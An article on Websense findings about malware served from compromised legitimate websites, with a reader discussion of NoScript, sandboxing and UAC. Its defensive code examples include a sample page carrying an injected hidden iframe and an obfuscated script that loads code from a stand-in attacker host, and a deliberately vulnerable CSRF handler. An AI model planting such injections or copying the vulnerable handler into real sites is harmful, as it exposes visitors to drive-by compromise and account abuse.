
Trusted Web sites: Exploit tool of choice

A new report offers insight into what is happening to Web sites. It is not what most of us want to hear. Michael Kassner explains.

Websense Security Labs provides twice-yearly reports assessing Web-based malware. Their latest report is not encouraging. Here's why:

  • 233 percent growth in the number of malicious sites in the last six months and a 671 percent growth during the last year.
  • 77 percent of Web sites with malicious code are legitimate sites that have been compromised.
  • 95 percent of comments to blogs, chat rooms and message boards are spam or malicious.
  • 57 percent of data-stealing attacks are conducted over the Web.
  • 85 percent of all unwanted emails in circulation contained links to spam sites and/or malicious Web sites.

Data acquisition

Websense uses their ThreatSeeker Network to collect data about compromised Web sites. The network consists of 50 million real-time data-collection points, each capable of monitoring Web and e-mail content for malicious code. The system is powerful enough to scan 40 million Web sites and 10 million e-mail messages per hour.

Threat Webscape

In order to understand what Web sites would be most appealing to cybercriminals, Websense created Threat Webscape. It is their way of classifying Web sites with regards to malware threats. They group Web sites into one of three classifications:

  • The 100 most-visited Web sites, usually "Social Networking" or "Search" sites.
  • The next million most-visited sites, primarily current event and news sites.
  • The remaining Web sites, typically business sites, blogs, and personal Web sites.

The focus needs to be on the 100 most-visited Web sites. They get the traffic, and traffic is what catches the attention of the bad guys. Also of interest is what these popular Web sites have in common:

  • More than 47 percent of the top 100 sites support user-generated content.
  • 61 percent of the top 100 sites either host malicious content or contain a masked redirect to lure unsuspecting victims from legitimate sites to malicious sites.
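The "masked redirect" in the second bullet is an element the visitor never sees but the browser still fetches. The scanner below, added here as an example and not part of the Websense report or its classification rules, flags the shapes such an injection usually takes in a page's HTML: an iframe hidden by style or shrunk to a pixel, a meta refresh, and a script that decodes itself before running. The heuristics and the sample page are this editor's constructed assumptions.

```python
"""Checks for the 'masked redirect' pattern: an element the visitor never
sees but the browser still fetches. Added example with constructed input;
the heuristics are this editor's assumptions, not Websense's rules."""
import re
from html.parser import HTMLParser

# Style or size tricks that keep an iframe out of sight (assumed indicators).
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|(?:width|height)\s*:\s*0(?:px)?",
    re.I,
)
# Script text that decodes itself before running (assumed indicators).
OBFUSCATED = re.compile(
    r"unescape\s*\(|String\.fromCharCode\s*\(|(?:%[0-9a-f]{2}){8,}", re.I
)


class RedirectScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []        # list of (kind, detail) tuples, document order
        self.in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "iframe":
            tiny = a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
            if tiny or HIDDEN_STYLE.search(a.get("style", "")):
                self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            # A meta refresh is a redirect the visitor never clicked.
            self.findings.append(("meta-refresh", a.get("content", "")))
        elif tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script and OBFUSCATED.search(data):
            self.findings.append(("obfuscated-script", data.strip()[:60]))


def scan(html: str):
    """Return the suspicious elements found in one page."""
    p = RedirectScanner()
    p.feed(html)
    p.close()
    return p.findings


# Constructed page: one ordinary ad iframe, one injected 1x1 hidden iframe,
# and one self-decoding script of the kind mass injections leave behind.
SAMPLE_PAGE = """<html><body>
<h1>Quarterly results</h1>
<iframe src="http://ads.example/banner" width="300" height="250"></iframe>
<iframe src="http://bad.example/in.cgi?3" style="display:none" width="1" height="1"></iframe>
<script>document.write(unescape('%3Cscript src=%22http://bad.example/x.js%22%3E%3C%2Fscript%3E'));</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan(SAMPLE_PAGE):
        print(f"{kind}: {detail}")
```

Run it over the HTML your own server actually sends (fetch with a normal browser User-Agent, since some injections only appear to browsers), and compare against a known-clean copy; the ordinary 300x250 ad iframe is deliberately not flagged, so the check separates legitimate third-party content from the hidden kind.
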

Prominent examples

Websense could not have timed the release of their report better. There have been several examples of high-profile Web sites being compromised this past week. Here is a quote from the New York Times:

"Over the weekend, some visitors to the Web site of The New York Times received a nasty surprise. An unknown person or group sneaked a rogue advertisement onto the site's pages."

As I am writing, Ryan Naraine of ZDNet reported that PBS.org is also similarly compromised:

"Some sections of the popular PBS.org Web site have been hijacked by hackers serving up a cocktail of dangerous exploits."

Because both are trusted Web sites, visitors have little reason for suspicion. That is exactly what makes the two sites such effective malware delivery tools.

Web 2.0: the cure and the curse

The figures above show that Web sites built on Web 2.0 applications account for almost half of the top 100 sites. They are popular because anyone can create content that the public can view; Facebook and Twitter are prime examples, and we know how successful they are.

The same capabilities increase the chance of abuse. Because the content on a Web 2.0 site is dynamic and supplied by its users, an attacker can plant content of his own, which opens the door to a variety of attacks.

For example, security researcher Ronen Zilberman found a serious vulnerability on the Facebook Web site. If exploited, it would allow attackers to steal personal information, pictures, and friend lists from unsuspecting members. Zilberman explains on his blog that the attack uses Cross-Site Request Forgery (CSRF): a malicious page makes the logged-in member's browser send requests to Facebook, and Facebook honours them because the browser attaches the member's session cookie, so the actions are carried out without the member's knowledge.
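The mechanism described above, side by side with the server-side check that stops it, as an added example. The handler shapes, cookie name, origin and session data are constructed for illustration and are not Facebook's code or Zilberman's proof of concept; CSRF works against any site that authorises a state-changing request on the session cookie alone.

```python
"""CSRF: a forged cross-site request rides on the victim's own cookie.
Added example; handlers, cookie name and origins are constructed."""
import hashlib
import hmac
import secrets

# Hypothetical per-deployment secret; in practice loaded from configuration.
SERVER_KEY = secrets.token_bytes(32)
# The site's own origin(s); browsers set the Origin header on cross-site POSTs.
ALLOWED_ORIGINS = {"https://www.example.test"}


def issue_csrf_token(session_id: str) -> str:
    """Token embedded in the site's own forms, bound to the session so a
    token lifted from one session cannot be replayed against another."""
    return hmac.new(SERVER_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def change_email_vulnerable(req: dict, sessions: dict):
    """Trusts the session cookie alone. A page on evil.test can auto-submit a
    hidden form to this URL; the browser attaches the victim's cookie and the
    change goes through without the member seeing anything."""
    user = sessions.get(req["cookies"].get("sid"))
    if user is None:
        return 401, "not logged in"
    user["email"] = req["form"]["email"]
    return 200, "email changed"


def change_email_hardened(req: dict, sessions: dict):
    """Same action, but the request must prove it came from one of our pages."""
    sid = req["cookies"].get("sid")
    user = sessions.get(sid)
    if user is None:
        return 401, "not logged in"
    # 1. Origin (or, failing that, Referer) must be ours; a cross-site page
    #    cannot forge this header from inside the browser.
    origin = req["headers"].get("Origin") or req["headers"].get("Referer", "")
    if not any(origin == o or origin.startswith(o + "/") for o in ALLOWED_ORIGINS):
        return 403, "cross-site request refused"
    # 2. The form must carry the session-bound token that only our own pages
    #    embed; the attacker's page cannot read it. Compare in constant time.
    token = req["form"].get("csrf_token", "")
    expected = issue_csrf_token(sid)
    if not hmac.compare_digest(token.encode(), expected.encode()):
        return 403, "missing or bad csrf token"
    user["email"] = req["form"]["email"]
    return 200, "email changed"


def demo():
    """Constructed sample: a logged-in member, and a forged request that a
    page on another site made the member's browser send."""
    sessions = {"s1": {"email": "alice@example.test"}}
    forged = {
        "cookies": {"sid": "s1"},                   # attached by the browser automatically
        "headers": {"Origin": "https://evil.test"},
        "form": {"email": "mallory@evil.test"},     # no csrf_token: attacker has none to send
    }
    vulnerable = change_email_vulnerable(forged, sessions)
    sessions["s1"]["email"] = "alice@example.test"  # reset for the second run
    hardened = change_email_hardened(forged, sessions)
    return vulnerable, hardened, sessions["s1"]["email"]


if __name__ == "__main__":
    print(demo())
```

Both checks are needed: the Origin/Referer check catches the plain cross-site form post, and the token catches the cases where the header is absent or stripped by a proxy. Current browsers add a third layer, the SameSite attribute on the session cookie, which keeps the cookie off cross-site POSTs altogether.
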

On the rise

Luring people to a malicious Web site by accident, or directing them to one from an e-mail message, still works. But compromising a legitimate Web site is better on every count for the cybercriminal: there is no suspicious-looking URL and no imitation page to give the game away, and the site's own visitors are delivered straight to the exploit.

Experts are concerned about the number of compromised legitimate Web sites. Nine-ball had infiltrated over 40,000 sites as of June 2009; Gumblar, another mass-compromise campaign, has hit 70,000 Web sites. A slide from the Websense report (not reproduced here) shows how prolific Nine-ball is.

Final thoughts

It stands to reason: compromising the real thing will always give better results. As users, our first line of defence is to keep the operating system and application software up to date. Patching closes the known vulnerabilities that malware delivered by a compromised Web site relies on to gain a foothold; it does not help against a flaw that has not yet been patched.

About

Information is my field...Writing is my passion...Coupling the two is my mission.

56 comments
Ocie3

To quote one of your posts: "For sure, zero-day exploits and those only known to the bad guys will negate any advantage of having up-to-date OSs, applications and anti-malware. But what other options do we have?"

Sandboxie: http://www.sandboxie.com/

The home page shows the basic concept of using a "sandbox" in which to execute programs. Any malware that a system acquires is downloaded into the browser's sandbox, from which it cannot escape, and it will be eliminated when the contents of the sandbox are deleted (I have configured Sandboxie to use Sysinternals Secure Delete). The only time that I run Firefox or Thunderbird outside of a sandbox is to update them. It is probably technically possible to update Firefox or Thunderbird while it is running in a sandbox, but there is a risk that the update might not be properly installed. Also, I run I.E. in a sandbox except only on Microsoft's Patch Tuesday, to download and install their patches and fixes. If the MS Windows Update website were compromised by malware, so that it could piggyback on the Windows update, then certainly my computer system would be compromised (and quite likely several million others, too).

Installing Sandboxie is easy, and a new user can do well with the default sandbox immediately. Beyond that, configuring Sandboxie requires some time and effort to learn, but the learning curve is not all that steep (especially for an IT pro).

Caveat: Sandboxie cannot be used with 64-bit Intel hardware, because the hardware is designed to disallow kernel-mode drivers of any and all kinds. The bad guys cannot install undetectable rootkits, but the good guys cannot sandbox their Internet-facing applications to protect their computers.

Craig_B

Over the weekend, I was checking an email account on Yahoo and when I clicked to view the next message a fake anti-virus popped up. I tried to close the window via a mouse click X and green_av.exe tried to install. Vista UAC was activated and my real anti-virus kicked in, so no damage was done. I should have just killed IE. It was nice to see the UAC kick in, this is the first time I have ever seen it when I was not trying to do an install or admin function. This is really becoming a big problem though when the large sites can't stop this stuff. I guess, keep your OS, Apps, AV, FW, etc up to date. On a side note; I wonder how much computer resources and human resources are devoted just to keep a computer running.

Camarrin

You don't mention how to thwart the PC takeover or how you are tracking where the threat is coming from. Who is going after these "bad guys", and why don't we hear about some of them being arrested?

progan01

I happened upon a scareware attack for VirusDoctor / Green_AV on a small site. To get rid of the attack, the site disabled all ads. What will be the cumulative impact of this response on revenues for Web businesses? This is no longer an inconvenience; it's a threat to American e-commerce.

santeewelding

You are not retired. You are an agent for the good. Probably armed.

MarkGyver

UAC seems fairly useful for those that don't want to bother with separate admin/user accounts. However, IE should never have let the program try to run to begin with. Hopefully it was just a bug this time and they'll fix it quickly, unlike the architecture problems in IE before 7.

Michael Kassner

I have little experience with UAC, but it has to be the way to go. It was good to read a first-hand experience. JCitizen swears by UAC as well. Is it the same on Windows 7? Again, thanks for sharing. My opinion about processes goes way up when trusted TR members give a positive report.

RookieTech

That's what I like to see a system do: fix lonely hackers' BS.

Michael Kassner

In the final thoughts, I mentioned the only for-sure thing that will help, and that is to remove any and all vulnerabilities from the computer you are using. No vulnerabilities, no malware. If you read the reports and go to the Websense site, they go into detail about what is being done to prevent further Web servers from getting infected. They aren't really naming any specific sites, as they are allowing them to fix the problem. That way other cybercriminals do not have a chance to attack vulnerable sites. Finding the bad guys is harder than you think. The subverted Web server is usually a standalone that only drops a trojan onto the PC. If that is successful, then the PC will phone home to a malware server and get whatever malware the server provides. Edit: spelling. I guess I have issues with site and sight.

---TK---

First off, have you ever run a Web server, or any server with an open port for the world to see? If so, check your logs and you will see that you are being brute-force attacked more than you can possibly imagine. When you track down the IP address, a lot of the attacks come from China and different parts of Europe, etc., and odds are that it is some other machine that got taken over. So what do you do? Be proactive: create a script that bans IPs after x amount of attempts to log in, and bans for x amount of time. Keep your software updated, and know that security is a figment of your imagination; all it takes is time. We do hear of some of them being arrested, you just need to keep your ear to the ground. Although it isn't often enough, I do admit.
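The ban-after-x-attempts script TK describes, as an added example that is not part of TK's comment or of the article. It reads failed-login lines in OpenSSH's syslog format and bans a source once it crosses a threshold inside a sliding window; the log lines are constructed, and the threshold, window and iptables rule are this editor's assumptions.

```python
"""Ban a source after N failed logins in a sliding window, driven from the
server's own log. Added example; log lines are constructed, and the
threshold, window and firewall rule are assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

FAIL_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+) port \d+"
)


def find_ips_to_ban(lines, max_attempts=5, window=timedelta(minutes=10), year=2009):
    """Return {ip: time of the attempt that crossed the threshold}.

    Syslog timestamps carry no year, so the caller supplies it. A slow
    attacker whose attempts are spread wider than the window is not banned,
    which is the trade-off any such threshold makes.
    """
    recent = defaultdict(deque)   # ip -> failure timestamps inside the window
    banned = {}
    for line in lines:
        m = FAIL_RE.match(line)
        if not m:
            continue                # successful logins and unrelated lines
        ip = m["ip"]
        if ip in banned:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()             # drop failures older than the window
        if len(q) >= max_attempts:
            banned[ip] = ts
    return banned


def iptables_rules(banned):
    """Firewall commands to apply the bans (assumed: Linux iptables)."""
    return [f"iptables -I INPUT -s {ip} -j DROP" for ip in sorted(banned)]


# Constructed log: a fast attacker (203.0.113.7) and a slow one (198.51.100.9)
# whose five attempts span more than the ten-minute window.
SAMPLE_LOG = """\
Sep 14 03:00:00 web1 sshd[2001]: Failed password for root from 198.51.100.9 port 3000 ssh2
Sep 14 03:03:00 web1 sshd[2004]: Failed password for root from 198.51.100.9 port 3001 ssh2
Sep 14 03:06:00 web1 sshd[2008]: Failed password for root from 198.51.100.9 port 3002 ssh2
Sep 14 03:09:00 web1 sshd[2012]: Failed password for root from 198.51.100.9 port 3003 ssh2
Sep 14 03:12:01 web1 sshd[2111]: Failed password for root from 203.0.113.7 port 41022 ssh2
Sep 14 03:12:03 web1 sshd[2111]: Failed password for root from 203.0.113.7 port 41022 ssh2
Sep 14 03:12:05 web1 sshd[2113]: Failed password for invalid user admin from 203.0.113.7 port 41030 ssh2
Sep 14 03:12:08 web1 sshd[2115]: Failed password for invalid user oracle from 203.0.113.7 port 41035 ssh2
Sep 14 03:12:09 web1 sshd[2118]: Accepted password for mike from 192.0.2.10 port 50122 ssh2
Sep 14 03:12:11 web1 sshd[2117]: Failed password for root from 203.0.113.7 port 41041 ssh2
Sep 14 03:12:14 web1 sshd[2119]: Failed password for root from 203.0.113.7 port 41044 ssh2
Sep 14 03:12:30 web1 sshd[2120]: Failed password for root from 198.51.100.9 port 3004 ssh2
"""

if __name__ == "__main__":
    for rule in iptables_rules(find_ips_to_ban(SAMPLE_LOG.splitlines())):
        print(rule)
```

Pair the ban with an expiry (the "x amount of time" in the comment) and whitelist your own management addresses before enabling it, since a mistyped password from your own workstation would otherwise lock you out.
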

robo_dev

Thwarting PC takeover is all about malware/virus defense. For example, the Firefox add-in called NoScript blocks all scripts, unless you allow them. Scripts can and do install malware. Your AV and anti-spyware protection should be up-to-snuff, too. Last but not least, create a non-admin account on your PC so software (viruses/malware) cannot be installed through the web browser. Finally, if you're gonna surf nasty sites, use a bootable 'Live' Linux CD-Distro. You cannot infect a read-only OS. Who is going after the bad guys? That's a tough question... everybody and nobody?? Many of these 'bad guys' are in countries in which the US has no power to arrest/prosecute them, and what they do may not even be a crime where they live. And the size/scope/technology of the internet makes it very tricky to track down who is doing what. Sometimes these guys are arrested, but rarely: do a Google search on 'spammer arrest' and you get 6 million hits. There is hope.

Michael Kassner

For malware developers to attack Web servers as well. The one that I find most fascinating is where the adware is actually on a different server and not being vetted enough. That is what hit the New York Times site.

Ocie3

FWIW, I haven't encountered an issue while running Foxit (to read a .PDF) launched by Firefox in a sandbox. However, I only read, download and store .PDF files; I don't edit or create them. Foxit is simply launched in the same context that Adobe Reader would be launched. Sorry to hear that Sandboxie has issues with printing. I haven't tried to do that either. In the past I have sampled Sandboxie forum posts just to see what sort of problems were reported. It usually is not clear whether Sandboxie itself is the cause of a problem, or perhaps a contributor to it. Sometimes I think that there is such a huge variety in the available computer hardware that it is a wonder that Windows and applications somehow manage to run on most of it, let alone on all of it. Virtual machines appear to be the latest emerging "mass movement", especially for servers. But I have not become apprised of how that works with regard to whether the integrity of the data is preserved, and whether all of the data acquired by the VM is retained (without being infested with malware or an exploit) when the VM crashes.

JCitizen

Perhaps I can interest him in some good arms? =)

bsauer

Once the code has been downloaded into the temp space, along with the good code I might add, IE doesn't control execution. That is up to the operating system.

ultimitloozer

The no-hands, invisible installation through IE is an intentional design choice (known in MS parlance as a feature), not a bug. They even snuck this feature into Firefox (via a .NET patch) until they were called on it and allowed the user to disable it in its second incarnation.

Michael Kassner

Could you explain what you meant, when you wrote IE should not have let it run. I want to make sure I understand you. Thanks.

RU_Trustified

Michael, Is a fully patched system really secure, or simply less vulnerable? Since it will be impossible to remove all vulnerabilities, that means there will always be malware. The bad guys will know about vulnerabilities that the good guys don't know about, so are your assumptions actually correct? Perhaps we should really look at the definition of "trusted" here. I suggest you look up: Reduce Risks With These Guidelines for Updating Internet Server Security Origin: TechRepublic (http://www.techrepublic.com) By: John Pescatore and Edward Younker Date: 24/04/2003 If you are a Gartner customer you can access the 2007 revision for free under the title: Web Server Security Hierarchy This article does discuss what a truly trusted web server looks like. Why is this important? Back in 1998 an NSA paper basically said that without a secure OS, any security efforts in the application layer will eventually fail. So you need technology that works at both levels. You might want to google: "The Inevitability of Failure: The Flawed Assumption of Security in Modern Computing Environments" Now, there is a technology that controls at the OS level and in the app layer and makes sure that nothing in user space can bypass its kernel level behavior enforcement, but I won't mention it here, as I would have to state my disclaimer. :)

santeewelding

Websense "sight"? And, while I'm at it, ".., here's why" at the beginning of the original needs to be its own sentence. Harrumph.

Michael Kassner

Are becoming very prevalent as well. I had thought that was pretty much under control.

robo_dev

we would block all traffic from a country that was sending excessive spam/malware. If, for example, there were a threshold that said, 'over 10% spam or virus/malware from your domain and you get shut off'. So, for example, if North Korea was an offender, their internet access gets shut down until they clean up their act. This would force individual ISPs to actually start tracking down and shutting down the scammers/spammers that they support. Every scammer/spammer comes through an ISP of some sort, whether it's a school, government, or commercial ISP. Currently, how many ISPs really go after users who abuse the system? Not many. If that ISP got 'knocked off the air' because of abuse, would they do some house-cleaning? You betcha....

rfolden

"For example, the firefox add-in called NoScript blocks all scripts, unless you allow them." True, dat. But have you ever used Firefox for more than about 30 seconds with NoScript turned on? It renders the browser unusable. Another brilliant idea, poorly executed.

Michael Kassner

With that. Are you saying that programs can install without any user intervention?

JCitizen

Perhaps we can avoid reporting him as another spammer! I wonder if everyone at Trustifier is as ebullient and entertainingly informative as (s)he and Rob?

RU_Trustified

People have been blowing us off for years with that assumption without even looking at the technology. If a technology worked the same way as everything else, the end result could not be expected to work any better, or be considered innovative could it? When you use a technology that uses the language of the business operations and trust relationships within and between groups in the organization, you can make better rules.

RU_Trustified

I guess I missed the obvious point. If you don't want to add things inside the kernel, you add them outside, hence a Meta-kernel. It stems from exo-kernel research out of MIT, which examines specific use cases for operating systems etc..

RU_Trustified

Nothing to apologize about. Thinking about some of these issues is still in its infancy. Forget about experts in security; you could probably count the real ones on two hands. I would propose that the term "legitimate" Web sites be used rather than "trusted", as no matter what the intention, many can still be compromised without their knowledge and place customers and visitors to their sites at risk. There are two issues at play here: the integrity of legitimate Web sites and the robustness of the system defenses that Web site viewers have when they visit a compromised site. The more we can eliminate compromise of legitimate Web sites, the less risk there is to visitors of those sites. Then a technology like that of Websense can help sort out the risk of visiting less mainstream sites. As far as the point about patching vulnerabilities being your only option, that is conventional thinking as well. We now have a DoD report that says the leading Red Team (pen test) team in the US military was unable to break systems with our technology on it, despite identified vulnerabilities. Apparently, this is the first time that they ever failed to breach. This technology was created to convert low assurance systems into high assurance, and in order to do that, it must be able to prevent threats from exploiting vulnerabilities, even if they are unknown.

RU_Trustified

I had nothing to do with anything that was done with Phirelight. The description of the meta-kernel would have been beyond my technical capability then and probably still now, but that is what it is. I generally write from the mile-high view. Would you prefer if we just referred to it as a wrapper technology? What it is called is really irrelevant; it's what it does that is important. The falling down of previous high assurance systems was that they added new visible objects to the kernel. That meant that what was done on one OS, or even a single system, might not be recognizable or replicable on another. Our lead designer hit on the idea of using Discretionary Access Control (DAC) objects found in all operating systems as keys. That way the Trustifier ruleset can be pushed throughout the network to obtain secure enclaves, end-to-end trusted networks or, in defense lingo, cross-domain protection. I am not a coder, have no technical training in any way, and my previous description of myself as the accidental tourist of IT security is probably accurate, having fallen into this business quite by accident. My previous career was in health care, looking after seniors. The extent of my computer experience was trying to keep a Windows 98 system stable enough to run my kids' computer games. I developed no appetite for fiddling and tweaking systems. However, I now have an even bigger distaste for an industry that has managed to accomplish nothing as security has slid towards a state of failure in the 7 years that I have been observing, wasting not millions, but billions of dollars world wide that could be spent on more worthwhile things. I joke that we will be in for a renewal of the kerosene lamp and the barter system when the critical infrastructure goes down, but some days it does not seem funny. Since Guy Kawasaki said "those on the first curve are unable to comprehend, let alone embrace the second curve", I get why a nurse tending to seniors gets it and no one else does.
Since one tends to resort to what one knows already, how can anyone in the field resort to anything but the same broken model they know? Someone looking in from the outside can always see things differently, because he is not afflicted with the blinders that give everyone else tunnel vision. So, if you want to nitpick about writing, go ahead. There are only a handful of us and we have never paid ourselves anything in the 7 years I have been at it. So, if you want to make a difference, and help find solutions, drop on by; we'll find a use for your $25 words.

Michael Kassner

I agree to a point. The problem that usually surfaces is that such systems are not flexible enough.

Michael Kassner

I have felt that way for a long time, and have heard powerful developers speak of such. Yet we are still in the same place. If you look at history, security in most any endeavor has been playing catch up.

santeewelding

I suspect, given your title, and the similarity to your perambulations here, that you did the writing. Are you saying that when you speak to the world it is no more than marketing? That what you say here is marketing? That when you do not have your nose deep in code you market to me, and cannot be bothered with simulacrum?

RU_Trustified

that security is failing because it is simply not addressing the inherent design flaw that is the root cause of security problems. Don't have to believe me. Read the papers, read Ranum. Just because secure trusted systems have not been usable due to poor implementations in the past does not mean that we can ignore reality now. The stakes are getting too high for satisficing. The question is not whether we need them, but how can we make such systems usable, manageable and cost-effective?

RU_Trustified

By inserting a rules basis that supersedes normal kernel operations, it is possible to prevent configuration errors from allowing the violation of business operational rules.

RU_Trustified

since we spend our time and resources developing cutting edge technologies rather than marketing literature.

Michael Kassner

I forget about us. We do tend to create some problems for ourselves.

robo_dev

Nothing is unsinkable.... And don't forget, even the most secure system can be made insecure by a simple human configuration error. I once saw an EAL4-certified firewall subverted by an automated email spam script. How? The admin pushed a rule change that was a mistake.

santeewelding

Your meta-kernel, as written, amounts to security through the obscurity of overly-long sentences. Bad need of a rewrite.

Michael Kassner

I'm the one that harps about defining things and yet I don't. Oops and sorry. My interpretation of a trusted or legitimate Web site is really quite broad. Security experts consider any Web site that is not malicious or nefarious to be trusted or legitimate. The opposite would be the imitation sites or those using slightly different URL addresses. All in the hope of getting people to log in and give up private information. You also have a valid point about vulnerabilities. I tried to cover myself by saying it's our only option. To some extent it is, other than heuristic-style scanners. For sure, zero-day exploits and those only known to the bad guys will negate any advantage of having up-to-date OSs, applications and anti-malware. But what other options do we have?

Michael Kassner

I returned your e-mail. I think I have an issue with sight, site, as well as cite. Remember?

RU_Trustified

I believe the recent figures are that SQL injections via Web application attacks are the leading means of entry to the database/network.

slam5

Yeah, if they got knocked off the net, they would be forced to clean up their machines. I help people with their computers at their homes and frequently they don't clean up until their system is not usable. Honest.

Michael Kassner

Is that more than likely the computer sending spam and or malware is not that of the criminal, but of an innocent user whose computer got owned.

Ocie3

unwarranted. How can you say that NoScript is "another brilliant idea, poorly executed" if you haven't used it for more than about 30 seconds?? It certainly does not "render the browser unusable"! FYI: I've used NoScript from version 1 onward (i.e., for years). It is easy to use, and it has several other safety features in addition to enabling me to create and maintain the JavaScript whitelist. There are at least two other Firefox add-ons that you can use to control JavaScript execution instead of NoScript. They take little or no particular effort to use, but they also do not, in my opinion, offer the same degree of protection as NoScript (and they don't have other security features that, for example, stop clickjacking): https://addons.mozilla.org/en-US/firefox/search?q=javascript

seanferd

You have to allow some things, and make some of those permissions permanent if you visit the relevant sites frequently. The status bar interface is pretty much a no-brainer.

Michael Kassner

I trust two applications explicitly, TrueCrypt and NoScript. I have known Giorgio since NoScript was in beta. He had a few tough spots, figured them out and is dedicated to keeping NoScript viable.

robo_dev

It's true that with NoScript, you often have to hit the 'enable all this page' button when you're on a trusted site, but that's the price you pay for protection. That's not a flaw or program bug, it's just the way that it works. I've seen NoScript block some very nasty drive-by virus/malware infections; ones that were missed by the latest and greatest anti-virus tools. How did I learn this? I forgot to load NoScript on a PC, and it got infected by a nasty nasty virus that was not detected by my AV software. Thankfully I was able to run System Restore, then went back and loaded NoScript and re-visited the page that had the drive-by virus infection. BAM, NoScript caught it. It was neat watching the exploit get stopped in its tracks. It gave a whole page full of scripts that it blocked, showed what hacked web-site was trying to feed me the virus, the whole enchilada. The virus install script consisted of over twenty individual scripts that (would have) modded my registry, installed some executable code, etc. Kinda like smugly picking spent pistol rounds from the bullet-proof vest....

Michael Kassner

I know the developer and he would be interested in your problem. I have been using NoScript for years without any problems. It is very active, but I want to know what's going on.
